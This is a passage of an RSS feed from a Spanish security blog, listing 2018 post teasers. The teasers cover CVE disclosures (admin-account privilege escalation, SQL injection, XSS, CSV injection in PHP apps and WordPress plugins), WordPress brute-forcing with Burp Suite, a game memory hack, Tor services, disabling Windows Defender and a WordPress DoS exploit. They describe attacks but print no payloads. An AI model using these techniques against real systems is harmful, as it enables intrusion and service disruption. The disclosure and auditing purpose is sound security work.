&lt;h2 id="top-10-herramientas-de-seguridad-web"&gt;TOP 10 Herramientas de seguridad web&lt;/h2&gt;
&lt;h3 id="1-burp-suite"&gt;#1 Burp Suite&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/top-10-herramientas-de-seguridad-para-aplicaciones-web/top-10-herramientas-de-seguridad-para-aplicaciones-web_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/top-10-herramientas-de-seguridad-para-aplicaciones-web/top-10-herramientas-de-seguridad-para-aplicaciones-web_001.webp" alt="TOP 10 herramientas de seguridad para aplicaciones web" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-18922 Ticketly 1.0 - Escalación de Privilegios (Crear cuenta administrador)</title><link>https://hackpuntes.com/es/posts/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/</link><pubDate>Mon, 05 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/</guid><description>&lt;p&gt;Hoy, publico otra entrada relacionada con vulnerabilidades en aplicaciones web, esta vez, sobre un software de ticketing llamado &lt;a href="https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql" target="_blank" rel="noopener noreferrer"&gt;Ticketly 1.0&lt;/a&gt;
 desarrollado por AbiSoft. La vulnerabilidad encontrada, permite a un atacante &lt;strong&gt;crearse una cuenta de administrador&lt;/strong&gt; en el sistema mediante una vulnerabilidad de &lt;a href="https://www.owasp.org/index.php/Testing_for_Privilege_escalation_%5c%28OTG-AUTHZ-003%5c%29" target="_blank" rel="noopener noreferrer"&gt;Escalación de Privilegios&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18922" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18922&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="ticketly--cve-2018-18922"&gt;Ticketly - CVE-2018-18922&lt;/h2&gt;
&lt;h3 id="ticketly-10---privilege-escalation-add-admin-account"&gt;Ticketly 1.0 - Privilege Escalation (Add Admin Account)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador_001.webp" alt="CVE-2018-18922 Ticketly 1.0 - Escalación de Privilegios (Crear cuenta administrador)" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-18923 Ticketly 1.0 - Múltiples SQL Injections</title><link>https://hackpuntes.com/es/posts/cve-2018-18923-ticketly-multiples-sql-injections/</link><pubDate>Mon, 05 Nov 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18923-ticketly-multiples-sql-injections/</guid><description>&lt;p&gt;En la &lt;a href="https://hackpuntes.com/cve-2018-18922-ticketly-escalacion-de-privilegios-crear-cuenta-administrador/"&gt;entrada anterior&lt;/a&gt;
, hemos visto una vulnerabilidad de &lt;a href="https://www.owasp.org/index.php/Testing_for_Privilege_escalation_%5c%28OTG-AUTHZ-003%5c%29" target="_blank" rel="noopener noreferrer"&gt;Escalación de Privilegios&lt;/a&gt;
 en &lt;a href="https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql" target="_blank" rel="noopener noreferrer"&gt;Ticketly 1.0&lt;/a&gt;
, en esta entrada, vamos a ver otras vulnerabilidades que he encontrado en este software, en concreto, múltiples SQL Injections, estas vulnerabilidades han sido asociadas al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18923" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18923&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="ticketly--cve-2018-18923"&gt;Ticketly - CVE-2018-18923&lt;/h2&gt;
&lt;h3 id="ticketly-10---multiple-sql-injections"&gt;Ticketly 1.0 - Multiple SQL Injections&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18923-ticketly-multiples-sql-injections/cve-2018-18923-ticketly-multiples-sql-injections_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18923-ticketly-multiples-sql-injections/cve-2018-18923-ticketly-multiples-sql-injections_001.webp" alt="CVE-2018-18923 Ticketly 1.0 - Múltiples SQL Injections" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ticketly 1.0, es un software de ticketing desarrollado por AbiSoft para ofrecer soporte a los usuarios sobre incidencias en los sistemas, está basado en PHP y MySQL.&lt;/p&gt;</description></item><item><title>CVE-2018-18478 Libre NMS 1.43 - Cross-Site Scripting Persistente</title><link>https://hackpuntes.com/es/posts/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/</link><pubDate>Fri, 19 Oct 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Scripting Persistente&lt;/a&gt;
 descubierta en el software &lt;a href="https://github.com/librenms/librenms/releases/tag/1.43" target="_blank" rel="noopener noreferrer"&gt;Libre NMS 1.43&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18478" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18478&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="libre-nms--cve-2018-18478"&gt;Libre NMS - CVE-2018-18478&lt;/h2&gt;
&lt;h3 id="libre-nms-143--cross-site-scripting-persistente"&gt;Libre NMS 1.43 – Cross-Site Scripting Persistente&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente_001.webp" alt="CVE-2018-18478 Libre NMS 1.43 - Cross-Site Scripting Persistente" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Libre Network Monitoring System, es un software utilizado para monitoreo de red basado en PHP / MySQL / SNMP que incluye el soporte para una amplia gama de hardware de red y sistemas operativos que incluyen Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP y muchos más.&lt;/p&gt;</description></item><item><title>OWASP Juice Shop Project - Laboratorio para practicar las 10 vulnerabilidades más comunes en aplicaciones web</title><link>https://hackpuntes.com/es/posts/owasp-juice-shop-practicar-10-vulnerabilidades-mas-comunes-en-aplicaciones-web/</link><pubDate>Mon, 08 Oct 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/owasp-juice-shop-practicar-10-vulnerabilidades-mas-comunes-en-aplicaciones-web/</guid><description>&lt;p&gt;OWASP Juice Shop es una aplicación web desarrollada completamente en JavaScript con el objetivo de reproducir de manera intencionada las &lt;a href="https://www.owasp.org/index.php/Top_10-2017_Top_10" target="_blank" rel="noopener noreferrer"&gt;10 vulnerabilidades más comunes&lt;/a&gt;
 en aplicaciones web (Top Ten de OWASP) para que el usuario pueda explotarlas y aprender sobre la seguridad en aplicaciones web.&lt;/p&gt;
&lt;h2 id="top-ten-de-owasp-2017"&gt;TOP Ten de OWASP (2017)&lt;/h2&gt;
&lt;p&gt;Estas son las vulnerabilidades más comunes en aplicaciones web en el 2017&lt;/p&gt;
&lt;h3 id="1-inyección"&gt;1) Inyección&lt;/h3&gt;
&lt;p&gt;Las fallas de inyección, como SQL, NoSQL, OS o LDAP ocurren cuando se envían datos no confiables a un intérprete, como parte de un comando o consulta. Los datos dañinos del atacante pueden engañar al intérprete para que ejecute comandos involuntarios o acceda a los datos sin la debida autorización.&lt;/p&gt;</description></item><item><title>CVE-2018-15918 Jorani Leave Management System 0.6.5 - SQL Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/</link><pubDate>Mon, 03 Sep 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/</guid><description>&lt;p&gt;Esta entrada tiene como finalidad hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank" rel="noopener noreferrer"&gt;SQL Injection&lt;/a&gt;
 descubierta en el software &lt;a href="https://jorani.org/download.html" target="_blank" rel="noopener noreferrer"&gt;Jorani Leave Management System 0.6.5&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15918" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-159178&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="joranicve-2018-15918"&gt;Jorani CVE-2018-15918&lt;/h2&gt;
&lt;h3 id="jorani-leave-management-system-065--sql-injection"&gt;Jorani Leave Management System 0.6.5 – SQL Injection&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection_001.webp" alt="CVE-2018-15918 Jorani Leave Management System 0.6.5 - SQL Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jorani es un sistema de administración de licencias desarrollado en PHP / MySQL bajo una licencia AGPL v3, está diseñado para proporcionar solicitud de flujos de trabajo simples y tiempo extra para organizaciones pequeñas.&lt;/p&gt;</description></item><item><title>CVE-2018-15917 Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente</title><link>https://hackpuntes.com/es/posts/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/</link><pubDate>Sat, 01 Sep 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Scripting Persistente&lt;/a&gt;
 descubierta en el software &lt;a href="https://jorani.org/download.html" target="_blank" rel="noopener noreferrer"&gt;Jorani Leave Management System 0.6.5&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15917" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15917&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="joranicve-2018-15917"&gt;Jorani CVE-2018-15917&lt;/h2&gt;
&lt;h3 id="jorani-leave-management-system-065---cross-site-scripting-persistente"&gt;Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente_001.webp" alt="CVE-2018-15917 Jorani Leave Management System 0.6.5 - Cross-Site Scripting Persistente" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jorani es un sistema de administración de licencias desarrollado en PHP / MySQL bajo una licencia AGPL v3, está diseñado para proporcionar solicitud de flujos de trabajo simples y tiempo extra para organizaciones pequeñas.&lt;/p&gt;</description></item><item><title>CVE-2018-15873 Sentrifugo HRMS 3.2 - Blind SQL Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/</link><pubDate>Sun, 26 Aug 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Blind_SQL_Injection" target="_blank" rel="noopener noreferrer"&gt;Blind SQL Injection&lt;/a&gt;
 descubierta en el software &lt;a href="http://www.sentrifugo.com/download" target="_blank" rel="noopener noreferrer"&gt;Sentrifugo HRMS 3.2&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15873" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15873&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="sentrifugo-hrms-32---cve-2018-15873"&gt;Sentrifugo HRMS 3.2 - CVE-2018-15873&lt;/h2&gt;
&lt;h3 id="blind-sql-injection"&gt;Blind SQL Injection&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection_001.webp" alt="CVE-2018-15873 Sentrifugo HRMS 3.2 - Blind SQL Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Sentrifugo es un software open source que facilita la &lt;strong&gt;administración de recursos humanos&lt;/strong&gt; en las organizaciones. Está &lt;strong&gt;repleto de módulos&lt;/strong&gt; esenciales como evaluación, gestión del tiempo, gestión de licencias, gestión de empleados, análisis, contratación, verificación de antecedentes, servicio técnico y mucho más. Permite a los empleados &lt;strong&gt;contribuir de manera efectiva y productiva&lt;/strong&gt; a los objetivos de la organización.&lt;/p&gt;</description></item><item><title>CVE-2018-15571 WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/</link><pubDate>Fri, 24 Aug 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/</guid><description>&lt;p&gt;Buenas a todos de nuevo, volviendo de las vacaciones 🏖️, &lt;a href="https://cve.mitre.org/" target="_blank" rel="noopener noreferrer"&gt;MITRE&lt;/a&gt;
 me ha asignado otro CVE para plugins &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, esta vez, he descubierto una vulnerabilidad de ejecución remota de código a través de &lt;a href="https://www.owasp.org/index.php/CSV_Injection" target="_blank" rel="noopener noreferrer"&gt;inyección CSV&lt;/a&gt;
 en el plugin &lt;a href="https://wordpress.org/plugins/export-users-to-csv/" target="_blank" rel="noopener noreferrer"&gt;Export Users to CSV - 1.1.1&lt;/a&gt;
, desarrollado por &lt;a href="https://www.mattcromwell.com/products/export-users-to-csv" target="_blank" rel="noopener noreferrer"&gt;Matt Cromwell&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada, no ha sido reconocida por el autor y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15571" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15571&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-15571"&gt;WordPress Plugin CVE-2018-15571&lt;/h2&gt;
&lt;h3 id="export-users-to-csv---111---inyección-csv"&gt;Export Users to CSV - 1.1.1 - Inyección CSV&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection_001.webp" alt="CVE-2018-15571 WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>RouterSploit - Comprueba si tu router es vulnerable</title><link>https://hackpuntes.com/es/posts/routersploit-comprueba-si-tu-router-es-vulnerable/</link><pubDate>Sat, 28 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/routersploit-comprueba-si-tu-router-es-vulnerable/</guid><description>&lt;p&gt;El &lt;strong&gt;router&lt;/strong&gt; es, posiblemente, el &lt;strong&gt;dispositivo más propenso a ataques de nuestro hogar&lt;/strong&gt;, ya que es el encargado de dirigir todo el tráfico de nuestra red hacía Internet, lo que &lt;strong&gt;expone a que cualquier atacante externo intente vulnerarlo&lt;/strong&gt;. Desafortunadamente, la mayoría de las personas no dedican mucho tiempo a configurar este dispositivo crítico, por ejemplo, &lt;strong&gt;no actualizamos el firmware o dejamos las contraseñas por defecto&lt;/strong&gt;. En esta entrada, vamos a ver como podemos auditar de manera muy sencilla nuestro router mediante el framework &lt;strong&gt;RouterSploit.&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>CVE-2018-14430 WordPress Plugin Multi Step Form &lt;= 1.2.5 - Múltiples Cross Site Scripting Reflejados</title><link>https://hackpuntes.com/es/posts/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/</link><pubDate>Sat, 21 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/</guid><description>&lt;p&gt;Durante otra de mis auditorias a plugins para &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, he descubierto varias vulnerabilidades del tipo &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross Site Scripting Reflejado (XSS)&lt;/a&gt;
 en el plugin &lt;a href="https://es.wordpress.org/plugins/multi-step-form/" target="_blank" rel="noopener noreferrer"&gt;Multi Step Form &amp;lt;= 1.2.5&lt;/a&gt;
, desarrollado por &lt;a href="https://mondula.com/" target="_blank" rel="noopener noreferrer"&gt;Mondula GmbH&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14430" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-14430&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-14430"&gt;WordPress Plugin CVE-2018-14430&lt;/h2&gt;
&lt;h3 id="multi-step-form--125--múltiples-cross-site-scripting-reflejados"&gt;Multi Step Form &amp;lt;= 1.2.5 – Múltiples Cross Site Scripting Reflejados&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados_001.webp" alt="CVE-2018-14430 WordPress Plugin Multi Step Form &amp;lt;= 1.2.5 - Múltiples Cross Site Scripting Reflejados" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Como crear un hack para obtener monedas ilimitadas en videojuegos con Visual Studio y Cheat Engine</title><link>https://hackpuntes.com/es/posts/como-crear-un-hack-para-obtener-monedas-ilimitadas-en-videojuegos-con-vs-y-ce/</link><pubDate>Sun, 15 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/como-crear-un-hack-para-obtener-monedas-ilimitadas-en-videojuegos-con-vs-y-ce/</guid><description>&lt;p&gt;En esta entrada, vamos a aprender como &lt;strong&gt;crearnos nuestro propio hack&lt;/strong&gt; para videojuegos con el objetivo de obtener 💰 monedas ilimitadas, para el ejemplo, voy a crear un hack para el videojuego  &lt;strong&gt;«El Señor del Olimpo Zeus»&lt;/strong&gt;, uno de mis juegos favoritos. El hack, lo desarrollaremos en &lt;strong&gt;Visual Basic&lt;/strong&gt; con &lt;strong&gt;Visual Studio&lt;/strong&gt; y &lt;strong&gt;Cheat Engine&lt;/strong&gt; para encontrar la dirección de memoria dónde el videojuego almacena las monedas. Comentaros, que he elegido este videojuego por lo simple que resulta buscar las direcciones de memoria (son estáticas), en otros videojuegos, podemos encontrarnos direcciones de memoria dinámicas (cambian cada vez que se ejecuta el videojuego), las cuales se precisa &lt;strong&gt;encontrar los punteros&lt;/strong&gt; previamente para que el hack funcione, aunque los pasos son exactamente los mismos para encontrarlas, demora demasiado tiempo, quizás, en otra ocasión me anime a hacer un vídeo cuando tenga más tiempo. Os dejo este &lt;a href="https://es.wikipedia.org/wiki/Asignaci%C3%B3n_de_memoria" target="_blank" rel="noopener noreferrer"&gt;enlace&lt;/a&gt;
 por si queréis mirar más a fondo.&lt;/p&gt;</description></item><item><title>CVE-2018-13832 WordPress Plugin All In One Favicon &lt;= 4.6 - Autenticado Múltiples Cross Site Scripting Persistentes</title><link>https://hackpuntes.com/es/posts/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/</link><pubDate>Tue, 10 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/</guid><description>&lt;p&gt;Durante una de mis auditorias a plugins para &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, he descubierto varias vulnerabilidades del tipo &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross Site Scripting Persintente (XSS)&lt;/a&gt;
 en el plugin &lt;a href="https://wordpress.org/plugins/all-in-one-favicon/" target="_blank" rel="noopener noreferrer"&gt;All In One Favicon &amp;lt;= 4.6&lt;/a&gt;
, desarrollado por &lt;a href="http://www.techotronic.de/" target="_blank" rel="noopener noreferrer"&gt;Arne Franken de Techotronic&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13832" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-13832&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-13832"&gt;WordPress Plugin CVE-2018-13832&lt;/h2&gt;
&lt;h3 id="all-in-one-favicon--46--autenticado-múltiples-cross-site-scripting-persistentes"&gt;All In One Favicon &amp;lt;= 4.6 – Autenticado Múltiples Cross Site Scripting Persistentes&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss_001.webp" alt="CVE-2018-13832 WordPress Plugin All In One Favicon &amp;lt;= 4.6 - Autenticado Múltiples Cross Site Scripting Persistentes" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Enumerar usuarios y realizar ataques de fuerza bruta en WordPress con Burp Suite</title><link>https://hackpuntes.com/es/posts/enumerar-usuarios-y-realizar-ataques-de-fuerza-bruta-en-wordpress-con-burp-suite/</link><pubDate>Wed, 20 Jun 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/enumerar-usuarios-y-realizar-ataques-de-fuerza-bruta-en-wordpress-con-burp-suite/</guid><description>&lt;p&gt;En esta entrada vamos a ver como 👤 &lt;strong&gt;enumerar usuarios y realizar ataques de fuerza bruta&lt;/strong&gt; para intentar acceder al panel de administración de un sitio web desarrollado con el CMS (Gestor de contenido) WordPress, para realizar este ataque, haremos uso de la herramienta 🛠 &lt;a href="https://portswigger.net/burp" target="_blank" rel="noopener noreferrer"&gt;Burp Suite.&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Existen varios scripts e incluso herramientas como 🛠 &lt;a href="https://wpscan.org/" target="_blank" rel="noopener noreferrer"&gt;WPScan&lt;/a&gt;
 para realizar enumeración de usuarios y ataques por fuerza bruta, el inconveniente de estas herramientas, es que pueden realizar pruebas activas contra el sitio web que no deseamos realizar.&lt;/p&gt;</description></item><item><title>Crea tu servicio oculto en la red TOR con dirección onion personalizada</title><link>https://hackpuntes.com/es/posts/crea-tu-servicio-oculto-en-la-red-tor-con-direccion-onion-personalizada/</link><pubDate>Thu, 19 Apr 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/crea-tu-servicio-oculto-en-la-red-tor-con-direccion-onion-personalizada/</guid><description>&lt;p&gt;Cuando hablamos de la 🖧 &lt;strong&gt;red TOR&lt;/strong&gt;, solemos asociarla a todo tipo de actos delictivos (tráfico de drogas, cibercrimen organizado, venta de armas u otras actividades ilícitas), pero, al margen de esta mala imagen de la red TOR, es una &lt;strong&gt;excelente herramienta&lt;/strong&gt; que puede ayudarnos a mantener nuestra &lt;strong&gt;🕵️‍♂️ privacidad y anonimato&lt;/strong&gt; en la red, sobre todo si queremos ofrecer algún servicio sin revelar nuestra identidad.&lt;/p&gt;
&lt;p&gt;En esta entrada veremos como &lt;strong&gt;crear un servicio oculto en nuestro equipo y hacerlo accesible a la red TOR mediante una dirección onion personalizada&lt;/strong&gt;, los pasos que seguiremos serán los siguientes:&lt;/p&gt;</description></item><item><title>TorGhost - Reenvía todo el tráfico a la red TOR</title><link>https://hackpuntes.com/es/posts/torghost-reenvia-todo-el-trafico-a-la-red-tor/</link><pubDate>Thu, 12 Apr 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/torghost-reenvia-todo-el-trafico-a-la-red-tor/</guid><description>&lt;p&gt;La red &lt;strong&gt;TOR&lt;/strong&gt; es una &lt;strong&gt;de las mejores opciones a la hora de proteger nuestra identidad&lt;/strong&gt; en la red, dado que sus métodos de transferencia de datos son &lt;strong&gt;altamente criptográficos&lt;/strong&gt; y cada petición a un mismo servicio &lt;strong&gt;se envía por rutas diferentes utilizando múltiples nodos,&lt;/strong&gt; algo que complica mucho trazar a un usuario dentro la red.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/torghost-reenvia-todo-el-trafico-a-la-red-tor/torghost-reenvia-todo-el-trafico-a-la-red-tor_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/torghost-reenvia-todo-el-trafico-a-la-red-tor/torghost-reenvia-todo-el-trafico-a-la-red-tor_001.webp" alt="TorGhost - Reenvía todo el tráfico a la red TOR" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Para navegar por la red TOR, bastaría con 📦&lt;a href="https://www.torproject.org/download/download-easy.html.en" target="_blank" rel="noopener noreferrer"&gt;descargar su bundle&lt;/a&gt;
, pero, tenemos que tener en cuenta, que de esta manera &lt;strong&gt;solo protegeríamos nuestra privacidad usando su navegador, el resto de tráfico no se enviaría por TOR.&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Desactivar Windows Defender y Firewall completamente en Windows 10</title><link>https://hackpuntes.com/es/posts/desactivar-windows-defender-firewall-completamente-windows-10/</link><pubDate>Wed, 11 Apr 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/desactivar-windows-defender-firewall-completamente-windows-10/</guid><description>&lt;p&gt;Muchos de vosotros os preguntaréis &lt;strong&gt;por qué un usuario querría desactivar los sistemas de seguridad&lt;/strong&gt;, como Windows Defender o el Firewall de un equipo, poniendo así en riesgo el equipo ante alguna amenaza 🐞, pero ¿y si lo que queremos es analizar esas amenazas? ¿Y si autoinfecto mi equipo para estudiar cómo se comporta un determinado malware?, en estos casos, quizás te interese desactivar cualquier medida de protección de tu equipo.&lt;/p&gt;</description></item><item><title>Exploit CVE-2018-6389 - WordPress Core - Denial of Service</title><link>https://hackpuntes.com/es/posts/exploit-cve-2018-6389-wordpress-core-denial-of-service/</link><pubDate>Thu, 08 Mar 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/exploit-cve-2018-6389-wordpress-core-denial-of-service/</guid><description>&lt;p&gt;Últimamente estoy muy atento de las vulnerabilidades de 